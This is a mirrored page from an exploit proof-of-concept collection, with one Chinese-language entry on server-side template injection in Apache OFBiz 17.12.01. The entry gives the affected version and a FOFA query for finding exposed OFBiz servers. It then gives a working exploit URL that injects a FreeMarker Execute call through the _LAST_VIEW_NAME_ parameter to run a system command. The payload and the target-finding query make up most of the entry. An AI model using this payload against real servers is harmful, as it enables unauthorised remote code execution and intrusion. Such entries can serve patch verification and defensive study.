admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md
Threekiii ed6c0342e5 更新漏洞
2022-12-05 17:54:08 +08:00

831 B
Raw Blame History

Apache OfBiz 服务器端模板注入 SSTI

漏洞描述

Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE

参考链接:

漏洞影响

Apache OfBiz 17.12.01

FOFA

app="Apache_OFBiz"

漏洞复现

服务器端模板注入 renderLookupField

从不可信数据流request.getParameter("_LAST_VIEW_NAME_")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。

poc

https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO